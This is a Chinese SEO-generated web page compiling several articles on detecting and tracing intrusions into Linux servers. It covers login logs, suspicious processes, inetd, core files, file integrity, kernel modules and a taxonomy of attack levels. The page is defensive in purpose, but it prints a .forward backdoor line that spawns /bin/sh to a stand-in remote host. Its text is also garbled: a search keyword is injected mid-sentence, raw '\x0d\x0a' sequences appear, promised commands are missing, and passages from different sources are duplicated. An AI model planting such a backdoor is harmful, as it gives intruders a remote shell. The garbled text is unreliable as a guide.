锐客网

  1. 首页 > 睿知 > it技术 > >

linux服务器入侵命令 linux 入侵检测

系统IT技术

0基础自学linux运维-8.1-服务器入侵溯源小技巧整理(转)最近某司网站主页被篡改了,找师傅帮忙看看怎么回事,师傅没有空就交给linux服务器入侵命令我了……linux服务器入侵命令我自己这方面没有了解很多 。事情结束后,又找师傅问了问关于溯源linux服务器入侵命令的技巧经验,于是就有了这篇小结 。
看对方的目的是什么,就是最终目标是做什么 。然后根据自己经验 看看达到这个目标 需要进行什么操作 逆推回去 。看看这些过程都会留下什么日志 。
分析网站源码可以帮助我们获取网站被入侵时间, 黑客如何的 IP, 等信息, 对于接下来的日志分析有很大帮助 。
可以使用 D 盾查杀是否存在网站后门,如果存在 webshell,记录下该 webshell 的信息 。
找到 webshell 后 , 就可以根据该文件的路径,在日志里查找有关信息,例如访问该文件的 IP、时间等 。可以根据这些信息确定网站别入侵的时间,从而缩小搜索范围,运气好了可以直接根据 IP 找到黑客 。
diff 工具推荐-diffmerge
可以根据被修改的文件的修改时间,缩小搜索范围 。
可以根据文件的排序迅速找到被黑客修改的文件,从而找到入侵时间 。
例linux服务器入侵命令:查看 10 分钟内修改过的文件
网站日志一般为
根据上一步分析网站源码得到的信息在对日志文件进行筛选分析,因为日志文件会记录很多信息,如果一条一条分析,不是很现实 。
web-log 分析工具
系统日志分析
/var/log/wtmp 和/var/run/utmp 两个文件无法直接使用 cat 命令输出,但是可以使用一些命令来查看,比如 w/who/finger/id/last/ac/uptime
该命令查询 /var/log/wtmp 文件并显示 当前 系统中每个用户和它所运行的进程信息:
该命令往回搜索 /var/log/wtmp 文件来显示自从该文件第一次创建以来所有登录过的用户:
如果指明了用户,则该命令只显示该用户的近期活动:
/var/log/lastlog 文件在每次有用户登录时被查询 。可以使用 lastlog 命令来检查某特定用户上次登录的时间,并格式化输出上次登录日志 /var/log/lastlog 的内容 。它根据 UID 排序显示登录名、端口号(tty)和上次登录时间 。如果一个用户从未登录过,lastlog 显示 Never logged(从未登录过) 。注意需要以 root 运行该命令:
4. id 用单独的一行打印出当前登录的用户,每个显示的用户名对应一个登录会话 。如果一个用户有不止一个登录会话,那linux服务器入侵命令他的用户名将显示相同的次数:
检查服务器是否有黑客留下的木马程序 。
【linux服务器入侵命令 linux 入侵检测】 指令:ps aux|grep ‘pid’
整理完这篇总结,感觉溯源是一个很细节的事情,需要注意每一个细节,这篇总结也可以是一个备忘,以后在遇到溯源的活,做的时候就可以更系统一些 。第一次投稿写的不好,师傅们多多指教哈,嘻嘻 。
如何看Linux服务器是否被攻击?以下几种方法检测linux服务器是否被攻击:\x0d\x0a1、检查系统密码文件 \x0d\x0a首先从明显linux服务器入侵命令的入手linux服务器入侵命令,查看一下passwd文件linux服务器入侵命令,ls _l /etc/passwd查看文件修改的日期 。\x0d\x0a2、查看一下进程linux服务器入侵命令,看看有没有奇怪的进程 \x0d\x0a\x0d\x0a重点查看进程:ps _aef | grep inetd inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前,如果看到输出了一个类似inetd _s \x0d\x0a/tmp/.xxx之类的进程,着重看inetd \x0d\x0a_s后面的内容 。在正常情况下,LINUX系统中的inetd服务后面是没有-s参数的 , 当然也没有用inetd去启动某个文件;而solaris系统中\x0d\x0a也仅仅是inetd \x0d\x0a_s,同样没有用inetd去启动某个特定的文件;如果使用ps命令看到inetd启动了某个文件,而自己又没有用inetd启动这个文件 , 那就说明已经有人入侵了系统,并且以root权限起了一个简单的后门 。\x0d\x0a3、检查系统守护进程 \x0d\x0a检查/etc/inetd.conf文件,输入:cat /etc/inetd.conf | grep _v “^#” , 输出的信息就是这台机器所开启的远程服务 。\x0d\x0a一般入侵者可以通过直接替换in.xxx程序来创建一个后门 , 比如用/bin/sh 替换掉in.telnetd,然后重新启动inetd服务,那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell 。\x0d\x0a4、检查网络连接和监听端口 \x0d\x0a输入netstat -an,列出本机所有的连接和监听的端口,查看有没有非法连接 。\x0d\x0a输入netstat _rn , 查看本机的路由、网关设置是否正确 。\x0d\x0a输入 ifconfig _a,查看网卡设置 。\x0d\x0a5、检查系统日志 \x0d\x0a命令last | \x0d\x0amore查看在正常情况下登录到本机的所有用户的历史记录 。但last命令依赖于syslog进程,这已经成为入侵者攻击的重要目标 。入侵者通常会停止系\x0d\x0a统的syslog , 查看系统syslog进程的情况,判断syslog上次启动的时间是否正常,因为syslog是以root身份执行的,如果发现\x0d\x0asyslog被非法动过,那说明有重大的入侵事件 。\x0d\x0a在linux下输入ls _al /var/log \x0d\x0a检查wtmp utmp,包括messgae等文件的完整性和修改时间是否正常,这也是手工擦除入侵痕迹的一种方法 。\x0d\x0a6、检查系统中的core文件 \x0d\x0a通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法,典型的RPC攻击就是通过这种方式 。这种方式有一定的成功率,也就是说并不能\x0d\x0a100%保证成功入侵系统 , 而且通常会在服务器相应目录下产生core文件,全局查找系统中的core文件,输入find / -name core \x0d\x0a_exec ls _l {} \; 依据core所在的目录、查询core文件来判断是否有入侵行为 。\x0d\x0a7、检查系统文件完整性 \x0d\x0a检查文件的完整性有多种方法,通常通过输入ls _l \x0d\x0a文件名来查询和比较文件,这种方法虽然简单,但还是有一定的实用性 。但是如果ls文件都已经被替换了就比较麻烦 。在LINUX下可以用rpm _V \x0d\x0a`rpm _qf 文件名` \x0d\x0a来查询,查询的结果是否正常来判断文件是否完整 。在LINUX下使用rpm来检查文件的完整性的方法也很多,这里不一一赘述,可以man \x0d\x0arpm来获得更多的格式 。
雷网主机Linux服务器被入侵时的处理办法有哪些?随着Linux企业应用的扩展,有大量的网络服务器使用Linux操作系统 。Linux服务器的安全性能受到越来越多的关注,这里根据Linux服务器受到攻击的深度以级别形式列出 , 并提出不同的解决方案 。对Linux服务器攻击的定义是:攻击是一种旨在妨碍、损害、削弱、破坏Linux服务器安全的未授权行为 。攻击的范围可以从服务拒绝直至完全危害和破坏Linux服务器 。对Linux服务器攻击有许多种类,本文从攻击深度的角度说明,我们把攻击分为四级 。
攻击级别一:服务拒绝攻击(DoS)
由于DoS攻击工具的泛滥,及所针对的协议层的缺陷短时无法改变的事实,DoS也就成为了流传最广、最难防范的攻击方式 。
服务拒绝攻击包括分布式拒绝服务攻击、反射式分布拒绝服务攻击、DNS分布拒绝服务攻击、FTP攻击等 。大多数服务拒绝攻击导致相对低级的危险,即便是那些可能导致系统重启的攻击也仅仅是暂时性的问题 。这类攻击在很大程度上不同于那些想获取网络控制的攻击,一般不会对数据安全有影响 , 但是服务拒绝攻击会持续很长一段时间,非常难缠 。
到目前为止,没有一个绝对的方法可以制止这类攻击 。但这并不表明我们就应束手就擒,除了强调个人主机加强保护不被利用的重要性外,加强对服务器的管理是非常重要的一环 。一定要安装验证软件和过滤功能 , 检验该报文的源地址的真实地址 。另外对于几种服务拒绝可以采用以下措施:关闭不必要的服务、限制同时打开的Syn半连接数目、缩短Syn半连接的time out 时间、及时更新系统补丁 。
攻击级别二:本地用户获取了他们非授权的文件的读写权限
本地用户是指在本地网络的任一台机器上有口令、因而在某一驱动器上有一个目录的用户 。本地用户获取到了他们非授权的文件的读写权限的问题是否构成危险很大程度上要看被访问文件的关键性 。任何本地用户随意访问临时文件目录(/tmp)都具有危险性,它能够潜在地铺设一条通向下一级别攻击的路径 。
级别二的主要攻击方法是:黑客诱骗合法用户告知其机密信息或执行任务 , 有时黑客会假装网络管理人员向用户发送邮件,要求用户给他系统升级的密码 。
由本地用户启动的攻击几乎都是从远程登录开始 。对于Linux服务器,最好的办法是将所有shell账号放置于一个单独的机器上 , 也就是说,只在一台或多台分配有shell访问的服务器上接受注册 。这可以使日志管理、访问控制管理、释放协议和其他潜在的安全问题管理更容易些 。还应该将存放用户CGI的系统区分出来 。这些机器应该隔离在特定的网络区段,也就是说,根据网络的配置情况,它们应该被路由器或网络交换机包围 。其拓扑结构应该确保硬件地址欺骗也不能超出这个区段 。
攻击级别三:远程用户获得特权文件的读写权限
第三级别的攻击能做到的不只是核实特定文件是否存在,而且还能读写这些文件 。造成这种情况的原因是:Linux服务器配置中出现这样一些弱点:即远程用户无需有效账号就可以在服务器上执行有限数量的命令 。
密码攻击法是第三级别中的主要攻击法,损坏密码是最常见的攻击方法 。密码破解是用以描述在使用或不使用工具的情况下渗透网络、系统或资源以解锁用密码保护的资源的一个术语 。用户常常忽略他们的密码,密码政策很难得到实施 。黑客有多种工具可以击败技术和社会所保护的密码 。主要包括:字典攻击(Dictionary attack)、混合攻击(Hybrid attack)、蛮力攻击(Brute force attack) 。一旦黑客拥有了用户的密码,他就有很多用户的特权 。密码猜想是指手工进入普通密码或通过编好程序的正本取得密码 。一些用户选择简单的密码-如生日、纪念日和配偶名字,却并不遵循应使用字母、数字混合使用的规则 。对黑客来说要猜出一串8个字生日数据不用花多长时间 。
防范第三级别的攻击的最好的防卫方法便是严格控制进入特权,即使用有效的密码 。主要包括密码应当遵循字母、数字、大小写(因为Linux对大小写是有区分)混合使用的规则 。使用象"#"或"%"或"$"这样的特殊字符也会添加复杂性 。例如采用"countbak"一词 , 在它后面添加"#$"(countbak#$),这样您就拥有了一个相当有效的密码 。
攻击级别四:远程用户获得根权限
第四攻击级别是指那些决不应该发生的事发生了,这是致命的攻击 。表示攻击者拥有Linux服务器的根、超级用户或管理员许可权,可以读、写并执行所有文件 。换句话说,攻击者具有对Linux服务器的全部控制权,可以在任何时刻都能够完全关闭甚至毁灭此网络 。
攻击级别四主要攻击形式是TCP/IP连续偷窃,被动通道听取和信息包拦截 。TCP/IP连续偷窃 , 被动通道听取和信息包拦截 , 是为进入网络收集重要信息的方法,不像拒绝服务攻击,这些方法有更多类似偷窃的性质 , 比较隐蔽不易被发现 。一次成功的TCP/IP攻击能让黑客阻拦两个团体之间的交易,提供中间人袭击的良好机会,然后黑客会在不被受害者注意的情况下控制一方或双方的交易 。通过被动窃听 , 黑客会操纵和登记信息,把文件送达,也会从目标系统上所有可通过的通道找到可通过的致命要害 。黑客会寻找联机和密码的结合点,认出申请合法的通道 。信息包拦截是指在目标系统约束一个活跃的听者程序以拦截和更改所有的或特别的信息的地址 。信息可被改送到非法系统阅读,然后不加改变地送回给黑客 。
TCP/IP连续偷窃实际就是网络嗅探,注意如果您确信有人接了嗅探器到自己的网络上,可以去找一些进行验证的工具 。这种工具称为时域反射计量器(Time Domain Reflectometer,TDR) 。TDR对电磁波的传播和变化进行测量 。将一个TDR连接到网络上,能够检测到未授权的获取网络数据的设备 。不过很多中小公司没有这种价格昂贵的工具 。对于防范嗅探器的攻击最好的方法是:
1、安全的拓扑结构 。嗅探器只能在当前网络段上进行数据捕获 。这就意味着 , 将网络分段工作进行得越细,嗅探器能够收集的信息就越少 。
2、会话加密 。不用特别地担心数据被嗅探,而是要想办法使得嗅探器不认识嗅探到的数据 。这种方法的优点是明显的:即使攻击者嗅探到了数据,这些数据对他也是没有用的 。
特别提示:应对攻击的反击措施
对于超过第二级别的攻击您就要特别注意了 。因为它们可以不断的提升攻击级别,以渗透Linux服务器 。此时,我们可以采取的反击措施有: 首先备份重要的企业关键数据 。改变系统中所有口令,通知用户找系统管理员得到新口令 。隔离该网络网段使攻击行为仅出现在一个小范围内 。允许行为继续进行 。如有可能,不要急于把攻击者赶出系统,为下一步作准备 。
记录所有行为,收集证据 。这些证据包括:系统登录文件、应用登录文件、AAA(Authentication、Authorization、 Accounting , 认证、授权、计费)登录文件,RADIUS(Remote Authentication
Dial-In User Service) 登录,网络单元登录(Network Element Logs)、防火墙登录、HIDS(Host-base IDS , 基于主机的入侵检测系统) 事件、NIDS(网络入侵检测系统)事件、磁盘驱动器、隐含文件等 。收集证据时要注意:在移动或拆卸任何设备之前都要拍照;在调查中要遵循两人法则,在信息收集中要至少有两个人 , 以防止篡改信息;应记录所采取的所有步骤以及对配置设置的任何改变,要把这些记录保存在安全的地方 。检查系统所有目录的存取许可 , 检测Permslist是否被修改过 。
进行各种尝试(使用网络的不同部分)以识别出攻击源 。
为了使用法律武器打击犯罪行为,必须保留证据,而形成证据需要时间 。为了做到这一点,必须忍受攻击的冲击(虽然可以制定一些安全措施来确保攻击不损害网络) 。对此情形 , 我们不但要采取一些法律手段,而且还要至少请一家有权威的安全公司协助阻止这种犯罪 。这类操作的最重要特点就是取得犯罪的证据、并查找犯罪者的地址,提供所拥有的日志 。对于所搜集到的证据 , 应进行有效地保存 。在开始时制作两份,一个用于评估证据,另一个用于法律验证 。
找到系统漏洞后设法堵住漏洞,并进行自我攻击测试 。
网络安全已经不仅仅是技术问题 , 而是一个社会问题 。企业应当提高对网络安全重视,如果一味地只依靠技术工具,那就会越来越被动;只有发挥社会和法律方面打击网络犯罪,才能更加有效 。我国对于打击网络犯罪已经有了明确的司法解释,遗憾的是大多数企业只重视技术环节的作用而忽略法律、社会因素,这也是本文的写作目的 。
拒绝服务攻击(DoS)
DoS即Denial Of Service,拒绝服务的缩写,可不能认为是微软的DOS操作系统!DoS攻击即让目标机器停止提供服务或资源访问,通常是以消耗服务器端资源为目标,通过伪造超过服务器处理能力的请求数据造成服务器响应阻塞,使正常的用户请求得不到应答,以实现攻击目的 。
Linux如何判断自己的服务器是否被入侵1、检查系统密码文件
首先从明显的入手,查看一下passwd文件 , ls –l /etc/passwd查看文件修改的日期 。
检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来 。
1
awk –F:’$3==0 {print $1}’ /etc/passwd
顺便再检查一下系统里有没有空口令帐户:
1
awk –F: ‘length($2)==0 {print $1}’ /etc/shadow
2、查看一下进程,看看有没有奇怪的进程
重点查看进程:ps –aef | grep inetd
inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前,如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程,着重看inetd –s后面的内容 。在正常情况下 , LINUX系统中的inetd服务后面是没有-s参数的,当然也没有用inetd去启动某个文件;而solaris系统中也仅仅是inetd –s,同样没有用inetd去启动某个特定的文件;如果你使用ps命令看到inetd启动了某个文件,而你自己又没有用inetd启动这个文件,那就说明已经有人入侵了你的系统 , 并且以root权限起了一个简单的后门 。
输入ps –aef 查看输出信息,尤其注意有没有以./xxx开头的进程 。一旦发现异样的进程,经检查为入侵者留下的后门程序,立即运行kill –9 pid 开杀死该进程,然后再运行ps –aef查看该进程是否被杀死;一旦此类进程出现杀死以后又重新启动的现象,则证明系统被人放置了自动启动程序的脚本 。这个时候要进行仔细查找:find / -name 程序名 –print,假设系统真的被入侵者放置了后门,根据找到的程序所在的目录,会找到很多有趣的东东J
UNIX下隐藏进程有的时候通过替换ps文件来做,检测这种方法涉及到检查文件完整性 , 稍后我们再讨论这种方法 。
接下来根据找到入侵者在服务器上的文件目录,一步一步进行追踪 。
3、检查系统守护进程
检查/etc/inetd.conf文件,输入:cat /etc/inetd.conf | grep –v “^#”,输出的信息就是你这台机器所开启的远程服务 。
一般入侵者可以通过直接替换in.xxx程序来创建一个后门,比如用/bin/sh 替换掉in.telnetd,然后重新启动inetd服务,那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell 。
4、检查网络连接和监听端口
输入netstat -an,列出本机所有的连接和监听的端口,查看有没有非法连接 。
输入netstat –rn , 查看本机的路由、网关设置是否正确 。
输入 ifconfig –a,查看网卡设置 。
5、检查系统日志
命令last | more查看在正常情况下登录到本机的所有用户的历史记录 。但last命令依赖于syslog进程 , 这已经成为入侵者攻击的重要目标 。入侵者通常会停止系统的syslog,查看系统syslog进程的情况,判断syslog上次启动的时间是否正常,因为syslog是以root身份执行的,如果发现syslog被非法动过,那说明有重大的入侵事件 。
在linux下输入ls –al /var/log
在solaris下输入 ls –al /var/adm
检查wtmp utmp,包括messgae等文件的完整性和修改时间是否正常,这也是手工擦除入侵痕迹的一种方法 。
6、检查系统中的core文件
通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法 , 典型的RPC攻击就是通过这种方式 。这种方式有一定的成功率,也就是说它并不能100%保证成功入侵系统,而且通常会在服务器相应目录下产生core文件,全局查找系统中的core文件,输入find / -name core –exec ls –l {} \; 依据core所在的目录、查询core文件来判断是否有入侵行为 。
7、.rhosts和.forward
这是两种比较著名的后门文件,如果想检查你的系统是否被入侵者安装了后门,不妨全局查找这两个文件:
find / -name “.rhosts” –print
find / -name “.forward” –print
在某用户的$HOME下,.rhosts文件中仅包含两个+号是非常危险的,如果你的系统上开了513端口(rlogin端口,和telnet作用相同),那么任意是谁都可以用这个用户登录到你的系统上而不需要任何验证 。
看到这里如果想要深入的做安全加固服务以及安全部署
就必须找专业做服务器的安全公司来处理了国内也就Sine安全和绿盟比较专业提供 。
Unix下在.forward文件里放入命令是重新获得访问的常用方法在某一 用户$HOME下的.forward可能设置如下:
\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"
这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或procmail类程序, 很有可能还有问题 。在Solaris系统下 , 如果你运行如下命令:
ln -s /var/mail/luser ~/.forward
然后设置vacation有效,那么/var/mail/luser就会被拷贝到~/.forward,同时会附加"|/usr/bin/vacation me",旧的symlink被移到~/.forward..BACKUP中 。
直接删除掉这两个文件也可以 。
8、检查系统文件完整性
检查文件的完整性有多种方法,通常我们通过输入ls –l 文件名来查询和比较文件,这种方法虽然简单,但还是有一定的实用性 。但是如果ls文件都已经被替换了就比较麻烦 。在LINUX下可以用rpm –V `rpm –qf 文件名` 来查询,国家查询的结果是否正常来判断文件是否完整 。在LINUX下使用rpm来检查文件的完整性的方法也很多 , 这里不一一赘述 , 可以man rpm来获得更多的格式 。
UNIX系统中,/bin/login是被入侵者经常替换作为后门的文件,接下来谈一下login后门 :
UNIX里,Login程序通常用来对telnet来的用户进行口令验证 。入侵者获取login的源代码并修改,使它在比较输入口令与存储口令时先检查后门口令 。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入:这将允许入侵者进入任何账号,甚至是root目录 。由于后门口令是在用户真实登录并被日志记录到utmp和wtmP前产生的一个访问,所以入侵者可以登录获取shell却不会暴露该账号 。管理员注意到这种后门后,使用”strings”命令搜索login程序以寻找文本信息 。许多情况下后门口令会原形毕露 。入侵者又会开始加密或者更改隐藏口令,使strings命令失效 。所以许多管理员利用MD5校验和检测这种后门 。UNIX系统中有md5sum命令 , 输入md5sum 文件名检查该文件的md5签名 。它的使用格式如下:md5sum –b 使用二进制方式阅读文件;md5sum –c 逆向检查MD5签名;md5sum –t 使用文本方式阅读文件 。
在前面提到过守护进程,对于守护进程配置文件inetd.conf中没有被注释掉的行要进行仔细比较,举个简单的例子 , 如果你开放了telnet服务,守护进程配置文件中就会有一句:telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
可以看到它所使用的文件是 /usr/sbin/in.telnetd,检查该文件的完整性,入侵者往往通过替换守护进程中允许的服务文件来为自己创建一个后门 。
LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件,检查该文件的完整性 , 可以直接cat /etc/crontab,仔细阅读该文件有没有被入侵者利用来做其他的事情 。
不替换login等文件而直接使用进程来启动后门的方法有一个缺陷,即系统一旦重新启动,这个进程就被杀死了,所以得让这个后门在系统启动的时候也启动起来 。通常通过检查/etc/rc.d下的文件来查看系统启动的时候是不是带有后门程序;这个方法怎么有点象查windows下的trojan?
说到这里,另外提一下,如果在某一目录下发现有属性为这样的文件:-rwsr-xr-x 1 root root xxx .sh,这个表明任何用户进来以后运行这个文件都可以获得一个rootshell , 这就是setuid文件 。运行 find –perm 4000 –print对此类文件进行全局查找,然后删除这样的文件 。
9、检查内核级后门
如果你的系统被人安装了这种后门,通常都是比较讨厌的,我常常就在想,遇到这种情况还是重新安装系统算了J,言归正传 , 首先 , 检查系统加载的模块,在LINUX系统下使用lsmod命令,在solaris系统下使用modinfo命令来查看 。这里需要说明的是,一般默认安装的LINUX加载的模块都比较少,通常就是网卡的驱动;而solaris下就很多,没别的办法,只有一条一条地去分析 。对内核进行加固后,应禁止插入或删除模块,从而保护系统的安全 , 否则入侵者将有可能再次对系统调用进行替换 。我们可以通过替换create_module()和delete_module()来达到上述目的 。另外,对这个内核进行加固模块时应尽早进行 , 以防系统调用已经被入侵者替换 。如果系统被加载了后门模块,但是在模块列表/proc/module里又看不到它们,有可能是使用了hack工具来移除加载的模块 , 大名鼎鼎的knark工具包就有移除加载模块的工具 。出现这种情况,需要仔细查找/proc目录 , 根据查找到的文件和经验来判断被隐藏和伪装的进程 。Knark后门模块就在/proc/knark目录,当然可能这个目录是隐藏的 。
几条判断Linux服务器是否被入侵的技巧检查 1 - 当前都有谁在登录?
你首先要查看当前都有谁登录在服务器上 。发现攻击者登录到服务器上进行操作并不复杂 。
其对应的命令是 w 。运行 w 会输出如下结果:
08:32:55 up 98 days,5:43,2 users,load average: 0.05, 0.03, 0.00
USERTTYFROMLOGIN@IDLEJCPUPCPU WHAT
rootpts/0113.174.161.108:260.00s0.03s0.02s ssh root@
coopeaa12
rootpts/178.31.109.108:260.00s0.01s0.00s w
第一个 IP 是英国 IP , 而第二个 IP 是越南 IP 。这个不是个好兆头 。
停下来做个深呼吸, 不要恐慌之下只是干掉他们的 SSH 连接 。除非你能够防止他们再次进入服务器,否则他们会很快进来并踢掉你,以防你再次回去 。
请参阅本文最后的“被入侵之后怎么办”这一章节来看找到了被入侵的证据后应该怎么办 。
whois 命令可以接一个 IP 地址然后告诉你该 IP 所注册的组织的所有信息 , 当然就包括所在国家的信息 。
检查 2 - 谁曾经登录过?
Linux 服务器会记录下哪些用户,从哪个 IP,在什么时候登录的以及登录了多长时间这些信息 。使用 last 命令可以查看这些信息 。
输出类似这样:
rootpts/178.31.109.1Thu Nov 30 08:26still logged in
rootpts/0113.174.161.1Thu Nov 30 08:26still logged in
rootpts/178.31.109.1Thu Nov 30 08:24 - 08:26(00:01)
rootpts/0113.174.161.1Wed Nov 29 12:34 - 12:52(00:18)
rootpts/014.176.196.1Mon Nov 27 13:32 - 13:53(00:21)
这里可以看到英国 IP 和越南 IP 交替出现,而且最上面两个 IP 现在还处于登录状态 。如果你看到任何未经授权的 IP.
linux服务器入侵命令的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于linux 入侵检测、linux服务器入侵命令的信息别忘了在本站进行查找喔 。

    推荐阅读


    上一篇:如何更改倩女幽魂的服务器? 倩女幽魂怎么改服务器

    下一篇:阿里云服务器怎么设置防火墙 阿里云服务器怎么防止入侵